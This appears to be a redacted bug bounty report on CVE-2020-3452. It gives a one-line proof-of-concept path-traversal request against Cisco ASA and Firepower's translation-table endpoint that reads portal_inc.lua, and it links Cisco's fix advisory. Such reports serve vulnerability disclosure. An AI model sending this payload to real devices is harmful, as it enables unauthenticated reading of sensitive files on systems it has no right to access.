Summary:
#The affected IP:
█████
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
For example to read “/+CSCOE+/portal_inc.lua” file.
for example:
████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=…/
Cisco has released the fix https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
This vulnerability allows an unauthenticated, remote attacker to perform directory traversal attacks and read sensitive files on the system.